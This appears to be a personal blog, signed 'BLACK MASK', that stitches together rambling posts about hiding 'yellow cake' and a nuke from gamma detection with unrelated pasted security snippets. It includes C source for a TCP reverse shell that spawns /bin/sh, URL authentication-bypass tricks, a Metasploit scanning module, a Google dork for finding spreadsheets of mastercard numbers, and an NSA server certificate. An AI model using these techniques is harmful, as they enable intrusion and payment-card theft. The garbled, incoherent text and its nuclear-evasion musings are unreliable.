Monday, September 5, 2016

20 YELLOW CAKES READY TO USE...

I ended the computation discipline for a while, I achieved my goal, I let you think about it! So, you're saying you have 20 yellow cakes ready to use? And you say the botton question are in fact the gamma rays detection; I know that! I've been trought a lot of aspects, including the temperature, nevertheless gamma emissions cross trought cold; I've been trough dense materials, and I defintely not overcome the lead question, because its only possible to cover the nuke with as much dense lead is, or to replace it, platinium, the most rare and expensive metal that is; So, don't break our agreement, and I will find a solution.

Ok! I have a break here !!!! electronics !!! let me start by this
"If the metal is not grounded or connected to any other electron source, there will be excess positive charge accumulated on the surface which will stop further photoemission"

in that case we need an eletrostatic material...as a conductor to change the charge

https://en.wikipedia.org/wiki/Conductive_polymer

Sunday, September 4, 2016

You're the top geeks on the world I'm very very proud to have you as my friends, I said this morning to you, I know something you don't know, but I don't remember what it is, Jesus doesn't want to me to remember and doesn't want me to say to you right now; I'm the google cracker :) the first 4 bytes, 4 imput class on a java object must match the firewall code;
"This means making the constructor private or default access ("package-private"), or being in a package controlled by the package.access security property. Immutable classes themselves should declare fields final and protect against any mutable inputs and outputs as described in Guideline 6-2. Construction of immutable objects can be made easier by providing builders (cf. Effective Java [6])."

http://www.oracle.com/technetwork/java/seccodeguide-139067.html#6

How can I access a private constructor of a class?

One way to bypass the restriction is to use reflections:

import java.lang.reflect.Constructor;

public class Example {
    public static void main(final String[] args) throws Exception {
        Constructor<Foo> constructor = Foo.class.getDeclaredConstructor(new Class[0]);
        constructor.setAccessible(true);
        Foo foo = constructor.newInstance(new Object[0]);
        System.out.println(foo);
    }
}

class Foo {
    private Foo() {
        // private!
    }

    @Override
    public String toString() {
        return "I'm a Foo and I'm alright!";
    }
}

Cisco Crypto ACLs – Do they really need to match?

When starting out with IPsec tunnels it seems to be a common misconception that the crypto ACL, sometimes referred to as the encryption domain or the interesting traffic, must match 100% or be mirrored at both peers or the tunnel won't come up. This isn't strictly true. Whilst the ISAKMP phase 1 and IPsec phase 2 proposals must match, the crypto ACL can be different.
Assume that at the local peer traffic to be encrypted originates from 10.0.0.0/24 and is destined for 192.168.0.0/24. The crypto ACL would be:

access-list crypto_acl permit ip 10.0.0.0 255.255.255.0 192.168.0.0 255.255.255.0

1	access-list crypto_acl permit ip 10.0.0.0 255.255.255.0 192.168.0.0 255.255.255.0

access-list crypto_acl permit ip 192.168.0.0 255.255.255.0 10.0.0.0 255.255.255.0

1	access-list crypto_acl permit ip 192.168.0.0 255.255.255.0 10.0.0.0 255.255.255.0

But what about the following?

access-list crypto_acl deny ip 10.0.0.0 255.255.255.0 host 192.168.0.200 access-list crypto_acl permit ip 10.0.0.0 255.255.255.0 host 192.168.0.100

1 2	access-list crypto_acl deny ip 10.0.0.0 255.255.255.0 host 192.168.0.200 access-list crypto_acl permit ip 10.0.0.0 255.255.255.0 host 192.168.0.100

access-list crypto_acl permit ip 192.168.0.0 255.255.255.0 10.0.0.0 255.0.0.0

1	access-list crypto_acl permit ip 192.168.0.0 255.255.255.0 10.0.0.0 255.0.0.0

IPsec phase 2 can still be established even though the crypto ACL isn't mirrored at the local and remove peer. The local peer specifies 10.0.0.0/24 but the remote peer specifies 10.0.0.0/8. In this scenario IPsec phase 2 can only be initiated from the peer that has the larger subnet. This is true for both Cisco ASA and IOS.
And in the example above, in the local peer's ACL there's a deny ACE but none on the remote peer's ACL. In this scenario any traffic originating on the local peer from 10.0.0.0/24 destined to 192.168.0.200/32 won't traverse the tunnel. The device (ASA or IOS router) will look at the next crypto map in the sequence and try to match traffic there. If no crypto maps are found it'll flow unencrypted out of the egress interface.
Obviously be careful with mismatching subnets and using deny ACEs in the crypto ACL because you may end up with traffic trying to enter the wrong tunnel and other strange things happening.

https://0wned.it/2014/10/13/cisco-crypto-acls-do-they-really-need-to-match/

Saturday, September 3, 2016

this is the tunneling as far as I understand

if (!sync && replicationQueue != null && !usingBuddyReplication)
{
if (log.isDebugEnabled()) log.debug("Putting call " + call + " on the replication queue.");
- replicationQueue.add(commandsFactory.buildReplicateCommand(call));
+// replicationQueue.add(commandsFactory.buildReplicateCommand(call));
}
else
{

and this tricking the "sort of resize byte" for the email to go trought..if you care on understanding me...

a serialized byte[][] array where element 0 is the
- * transient state (or null) , and element 1 is the
- * persistent state (or null)
- * @param targetRoot node into which the state should be integrated
- */
- protected void setState(ObjectInputStream state, NodeSPI targetRoot) throws Exception
- {
- long startTime = System.currentTimeMillis();
- /*
- * Vladimir/Manik/Brian (Dec 7,2006)
- *
- * integrator.integrateState(in,targetRoot, cl) will call cache.put for each
- * node read from stream. Having option override below allows nodes read
- * to be directly stored into a tree since we bypass interceptor chain.
- *
- */
- if (log.isDebugEnabled())
- log.debug("starting state integration at node " + targetRoot + ". Fetch Persistent State = " + fetchPersistentState);
- integrator.integrateState(state, targetRoot.getDelegationTarget(), targetRoot.getFqn(), fetchPersistentState);
-
- if (log.isDebugEnabled())
- log.debug("successfully integrated state in " + (System.currentTimeMillis() - startTime) + " msec");
- }
-}

How to exclude a computer from SonicWALL Content Filtering Service/ to Allow Specific Email Addresses to Bypass Detection and Prevention by DPI Services

Java Code Examples for org.apache.cassandra.streaming.OperationType

/**
    * Not multi-threaded intentionally.
    * @return 
    */
   public Collection<PendingFile> stream(File directory) throws IOException, InterruptedException
   {
       Client client = new Client()
       {
           public boolean validateColumnFamily(String keyspace, String cfName)
           {
               return true;
           }

           public void init(String keyspace)
           {
           }
       };
       try {
    client.setPartitioner(config.getPartitioner());
} catch (Exception e) {
    logger.error("Configuration Exception while setting partitioner", e);
}
       
       
       SSTableLoader loader = new SSTableLoader(directory, client, options);       
       
       Collection<PendingFile> pendingFiles = Lists.newArrayList();
       for (SSTableReader sstable : loader.openSSTables())
       {
           Descriptor desc = sstable.descriptor;
           List<Pair<Long, Long>> sections = Lists.newArrayList(Pair.create(0L, sstable.onDiskLength()));
           PendingFile pending = new PendingFile(sstable, desc, SSTable.COMPONENT_DATA, sections, OperationType.BULK_LOAD);
           StreamHeader header = new StreamHeader(directory.getName(), UUID.randomUUID(), pending, Collections.singleton(pending));
           logger.info("Streaming to {}", InetAddress.getLocalHost());
           new FileStreamTask(header, InetAddress.getLocalHost()).run();
           logger.info("Done Streaming: " + pending.toString());
           sstable.releaseReference();
           pendingFiles.add(pending);
       }
       return pendingFiles;
   }

http://www.programcreek.com/java-api-examples/index.php?api=org.apache.cassandra.streaming.OperationType

A simple example of this is when a simple parameter is appended to the end of a URL.
For example, imagine a system that uses a parameter "auth" to signify if a user has been authenticated, and prompts for the log in procedure if auth=0, switching it to auth=1 once a successful login has taken place. As long as auth=1, the user remains authenticated and able to access restricted pages.
Trying to get to a restricted page, a user's browser might submit: http://www.mycorporatewebapp.com/remotemanagement.asp?auth=0
Bypassing this authentication might then be as simple as changing auth=0 to auth=1.
he question that hackers ask is whether there are alternative URLs, which are not on the "restricted list", which point to the same restricted pages? or example, imagine a restricted
Web page: http://mycorporatedevice/admin/configuration/
What if a hacker were to append an extra "/" at the end of this URL:
http://mycorporatedevice/admin/configuration//
or add some other character like "?" or "%" or "~"? In some cases these URLs are effectively equivalent, even though they look different. If the authentication mechanism only checks for the original URL but not the variations then it can easily be bypassed.

http://www.w4rri0r.com/attacker-surface/bypass-authentication.html

"After identifying an individual Tor user on the Internet, the NSA uses its network of secret Internet servers to redirect those users to another set of secret Internet servers, with the codename FoxAcid, to infect the user's computer. FoxAcid is an NSA system designed to act as a matchmaker between potential targets and attacks developed by the NSA, giving the agency opportunity to launch prepared attacks against their systems. Once the computer is
successfully attacked, it secretly calls back to a FoxAcid server, which then performs additional attacks on the target computer to ensure that it remains compromised long-term, and continues to provide eavesdropping information"

Friday, September 2, 2016

https://ssl-tools.net/subjects/e7283e531dbea071ab46d31bc35076989a9795a5


C=US

O=U.S. Government

OU=DoDPKINSA/CSS

CN=emsm-gh1-uea10.nsa.gov

Fingerprints: d9fcc417c2

Issuer:: DOD ID SW CA-37
Serial:: 12177
Not valid before:: 2016-04-12 14:40:26 UTC
Not valid after:: 2019-04-13 14:40:26 UTC
Key size:: 2048
Signature Algorithm:: sha256WithRSAEncryption

authorityKeyIdentifier:: keyid:16:24:7E:F7:2D:C1:EF:92:3F:BE:44:E7:54:5E:E9:FE:17:BA:F3:A1
subjectKeyIdentifier:: 53:D9:A5:2D:B9:AC:82:A0:F3:12:59:BE:C5:5B:A9:63:D6:81:83:25
authorityInfoAccess:: CA Issuers - URI:http://crl.disa.mil/sign/DODIDSWCA_37.cerOCSP - URI:http://ocsp.disa.mil
keyUsage:: Digital Signature, Key Encipherment
crlDistributionPoints:: Full Name: URI:http://crl.disa.mil/crl/DODIDSWCA_37.crl
subjectAltName:: DNS:emsm-gh1-uea10.nsa.gov
certificatePolicies:: Policy: 2.16.840.1.101.2.1.11.39
extendedKeyUsage:: TLS Web Server Authentication, TLS Web Client Authentication, 1.3.6.1.5.5.8.2.2

Certificates

Fingerprint		Issuer	Serial	Public Key	Download	Tools
d9fcc417c29a037dac90aea5f178e91d59ec9862		DOD ID SW CA-37	12177	d9fcc417c2

Create shellcode for a tcp reverse shell (SLAE)

**shell_reverse_tcp.c**
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26	`#include` `#include` `#include` `#include` `#include` `#include` `#include` `int` `main(void) {` `int` `sockfd;` `// file descriptor for socket` `int` `lportno = 12345;` `// listener port` `struct` `sockaddr_in serv_addr;` `// {2,str[14]}` *`char` `const` `params[] = {"/bin/sh",NULL};` `char` `const` `environ[] = {NULL};`* `sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);` `serv_addr.sin_family = AF_INET;` `// 2` `serv_addr.sin_addr.s_addr = inet_addr("127.0.0.1");` `// localhost` `serv_addr.sin_port = htons(lportno);` `// little endian` *`connect(sockfd, (struct` `sockaddr ) &serv_addr, 16);` `// redirect stdout and stderr` `dup2(sockfd,0);` `// stdin` `dup2(0,1);` `// stdout` `dup2(0,2);` `// stderr` `execve("/bin/sh",params,environ);` `}`**

 
http://www.arti-sec.com/article/create-shellcode-tcp-reverse-shell-slae 

YOU NEED TO KNOW WHERE TO GO:

endpoint_mapper
The endpoint_mapper module queries the EndPoint Mapper service of a 
remote system to determine what services are available. In the 
information gathering stage, this can provide some very valuable 
information.

msf > use auxiliary/scanner/dcerpc/endpoint_mapper 
msf auxiliary(endpoint_mapper) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    135              yes       The target port
   THREADS  1                yes       The number of concurrent threads
In order to run the module, all we need to do is pass it a range of IP addresses, set the THREADS count, and let it go to work.

https://www.offensive-security.com/metasploit-unleashed/scanner-dcerpc-auxiliary-modules/

Server signature , how to get it ?

Server signature is now available for everyone, i'll just show with pictures where to get it and how to use it.
Thats pretty simple.

Go to serverlist , choose the server you are interested in , check bottom infos to get the signature code.
(click on the picture to see fullsize)

Once you clicked on server signature you should get this :

Copy the code & insert it to your signature for example , using the " Insert Image" function

Which gives :

Tips : select your image(double click on it) then add a link example : http://et.trackbase.net/server/41109/
So if you click on your signature , you are redirected to your server page.

Just add two numbers, separated by two periods, with no spaces, into the search box along with your search terms. "mastercard 0..9999999999999999 filetype:xls"

should he place xls..or xks ...
I don't think is going to find nothing xls...because that is of course offline...so he needs a java reader ONLINE tool

Generate documentation from source code

Doxygen is the de facto standard tool for generating documentation from annotated C++ sources, but it also supports other popular programming languages such as C, Objective-C, C#, PHP, Java, Python, IDL (Corba, Microsoft, and UNO/OpenOffice flavors), Fortran, VHDL, Tcl, and to some extent D.
Doxygen can help you in three ways:

It can generate an on-line documentation browser (in HTML) and/or an off-line reference manual (in $\mbox{\LaTeX}$ ) from a set of documented source files. There is also support for generating output in RTF (MS-Word), PostScript, hyperlinked PDF, compressed HTML, and Unix man pages. The documentation is extracted directly from the sources, which makes it much easier to keep the documentation consistent with the source code.
You can configure doxygen to extract the code structure from undocumented source files. This is very useful to quickly find your way in large source distributions. Doxygen can also visualize the relations between the various elements by means of include dependency graphs, inheritance diagrams, and collaboration diagrams, which are all generated automatically.
You can also use doxygen for creating normal documentation (as I did for the doxygen user manual and web-site).

Doxygen is developed under Mac OS X and Linux, but is set-up to be highly portable. As a result, it runs on most other Unix flavors as well. Furthermore, executables for Windows are available.

http://www.stack.nl/~dimitri/doxygen/

Google Hacking Database (GHDB)

Search the Google Hacking Database or browse GHDB categories

https://www.exploit-db.com/google-hacking-database/

BLACK MASK